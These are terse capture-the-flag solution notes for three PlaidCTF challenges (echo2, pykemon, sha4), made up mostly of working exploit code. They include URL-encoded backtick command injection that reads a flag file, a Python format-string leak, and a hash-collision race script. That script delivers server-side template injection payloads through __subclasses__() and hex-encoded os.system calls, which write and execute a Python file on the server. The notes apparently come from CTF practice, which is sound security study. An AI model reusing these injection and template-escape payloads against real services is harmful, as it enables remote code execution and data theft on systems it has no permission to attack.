info: command injection at the input.
echo {input}
from requests import get
flag="PCTF{L"
x="""49
53
115
116
51
110
95
84
48
95
95
114
101
101
101
95
114
101
101
101
101
101
101
95
114
101
101
101
95
108
97
125""".split("\n")
for k in x:
flag += chr(int(k))
print flag
exit(1)
"""
http://echo2.chal.pwning.xxx:9977/audio/13dfdabcb06240b28e9f847877601d94/2.wav
http://echo2.chal.pwning.xxx:9977/audio/91752b54f8fb416faac895ff8698ce81/2.wav
http://echo2.chal.pwning.xxx:9977/audio/0e3bc71c6baa4babb86cdad06690890f/2.wav
http://echo2.chal.pwning.xxx:9977/audio/52018cc316f4416cb9ac041cf25cfeeb/2.wav
http://echo2.chal.pwning.xxx:9977/audio/2ded2beb78b5425297a2fc3067537b06/2.wav
http://echo2.chal.pwning.xxx:9977/audio/43a03f68b3124db08bbb1f0e62a933d8/2.wav
"""
for i in range(7, 50):
url = "http://echo2.chal.pwning.xxx:9977/?tweet_1=%60head+%2Fshare%2Fflag+-c+"+str(65000*i)+"+%7C+tail+-c+65000+%3E+%2Ftmp%2Fx%60&tweet_2=%60python+-c+%22exec%28%27f%3Dopen%28%5C%27%2Ftmp%2Fx%5C%27%2C+%5C%27rb%5C%27%29%3Bd%3Df.read%28%29%3Bf.close%28%29%3Bj%3D0%3Bc%3D64999%5Cnfor+i+in+range%28c%29%3A+j+%5E%3D+ord%28d%5Bi%5D%29%5Cnprint+j%5Eord%28d%5Bc%5D%29%27%29%22%60&tweet_3=&tweet_4="
c = get(url)
x = c.content.split('<h2>Tweet 2</h2>')[1].split('<source src="')[1].split('"')[0]
print "http://echo2.chal.pwning.xxx:9977/"+x
info: format sub function in the rename function.
return "Successfully renamed to:\n" + new_name.format(p)
p is Pykemon object. (p = check(name, 'caught')
)
I can get the member of Pykemon object with format.
input: {0.pykemon}
info: race condition, collision
make_collision.py
from sha4 import hash, seven_to_eight
import struct
from pyasn1.codec.ber.decoder import decode
key1 = bytearray("\x01\x03BBBB{" + "{\x20\x33+\x33\x20\x20" + "\x20}}"+"\x43"+"\x20"*3+""+"AAAAAA{"+"{\x20\x20\x20\x20\x20\x20" + "\x20}}")
key2 = bytearray("\x01\x03BBBBy" + "z\x20\x33+\x33\x20\x20" + "\x20=]"+"\x43"+"\x20"*3+""+"AAAAAAy"+"z\x20\x20\x20\x20\x20\x20" + "\x20=]")
key1 = "0103424242427b7b20332b332020207d7d432020204141414141417b7b20202020202027272e5f5f636c6173735f5f2e5f5f6d726f5f5f5b325d2e5f5f737562636c61737365735f5f28292020207d7d2020202020".decode("hex")
key2 = "010342424242797a20332b332020203d5d43202020414141414141797a20202020202027272e5f5f636c6173735f5f2e5f5f6d726f5f5f5b325d2e5f5f737562636c61737365735f5f28292020203d5d2020202020".decode("hex")
# 010300000041424344
print decode(str(key1))
print decode(str(key2))
print str(key1).encode("hex")
print str(key2).encode("hex")
print hash(key1) == hash(key2)
# print key1 == key2
for i in range(0xff+1):
key2[16] = i
if hash(key1) == hash(key2):
print chr(i), str(i)
# print hash("\x01\x01\x01\x00\x00\x00\x00\x00").encode("hex")
def fuck(x):
[val] = struct.unpack("Q", x+"\x00")
print hex(val)
out = 0
mask = 0b1111111
for shift in xrange(8):
out |= (val & (mask<<(7*shift)))<<shift
print hex(out)
return struct.pack("Q", out)
# fuck("C" + "AAAAAA")
# fuck("C" + "AAAAAA")
poc.py
from requests import post
import threading
from time import time, sleep
import sys
"""
key1 = bytearray("\x01\x03BBBB{" + "{\x20\x33+\x33\x20\x20" + "\x20}}"+"\x20"*4)
key2 = bytearray("\x01\x03BBBBy" + "z\x20\x33+\x33\x20\x20" + "\x20=]"+"\x20"*4)
0103424242427b7b20332b332020207d7d43202020
010342424242797a20332b332020203d5d43202020
"""
def pad(x):
suck = (len(x)/7)+1
return x.ljust(7*suck, " ")
def example(fuck):
url = "http://sha4.chal.pwning.xxx/comments"
payload = sys.argv[1]
asdf = sys.argv[2]
if fuck == True:
data = {
# 'comment': '0103424242427b7b20332b332020207d7d43202020'+"ABCDEFG".encode("hex")
'comment': '0103424242427b7b20332b332020207d7d43202020'+pad(asdf).encode('hex')+'4141414141417b7b202020202020'+pad(payload).encode('hex')+'207d7d2020202020'
}
else:
data = {
# 'comment': '010342424242797a20332b332020203d5d43202020'+"ABCDEFG".encode("hex")
'comment': '010342424242797a20332b332020203d5d43202020'+pad(asdf).encode('hex')+'414141414141797a202020202020'+pad(payload).encode("hex")+'203d5d2020202020'
}
a1 = time()
c1 = post(url, data=data)
# print c1.content
# return
if c1.status_code == 200 and c1.content.find("B6") != -1:
print c1.content
exit(0)
# print time()-a1
payload = "''.__class__.__mro__[2].__subclasses__()"
print '0103424242427b7b20332b332020207d7d432020204141414141417b7b202020202020'+pad(payload).encode('hex')+'207d7d2020202020'
print '010342424242797a20332b332020203d5d43202020414141414141797a202020202020'+pad(payload).encode("hex")+'203d5d2020202020'
while True:
th = threading.Thread(target=example, args=(False,))
th.start()
th = threading.Thread(target=example, args=(True,))
th.start()
# th.join()
# input 93
payload
write code to /var/tmp/comments/junoim
python poc.py "config.__doc__.__class__.mro()[2].__subclasses__()[40](comment[96:144].decode(comment[93:96]), comment[144:146].decode(comment[93:96])).write(comment[147:359].decode(comment[93:96]))" "hex2f7661722f746d702f636f6d6d656e74732f6a756e6f696d77_696d706f7274206f733b6f732e73797374656d2827636174202f7661722f7777772f736861342f666c61675f62696c6161626c75616762696c75617269676c75626c61697265756772706f6f70203e202f7661722f746d702f636f6d6d656e74732f6a756e6f696d2729"
run code via config.frompyfile
python poc.py "config.from_pyfile(comment[96:144].decode(comment[93:96]))" "hex2f7661722f746d702f636f6d6d656e74732f6a756e6f696d77_696d706f7274206f733b6f732e73797374656d28276c732729"
read the flag
python poc.py "config.__doc__.__class__.mro()[2].__subclasses__()[40](comment[96:144].decode(comment[93:96])).read()" "hex2f7661722f746d702f636f6d6d656e74732f6a756e6f696d77_696d706f7274206f733b6f732e73797374656d28276c732729"
sha4: there was an easy way to execute command..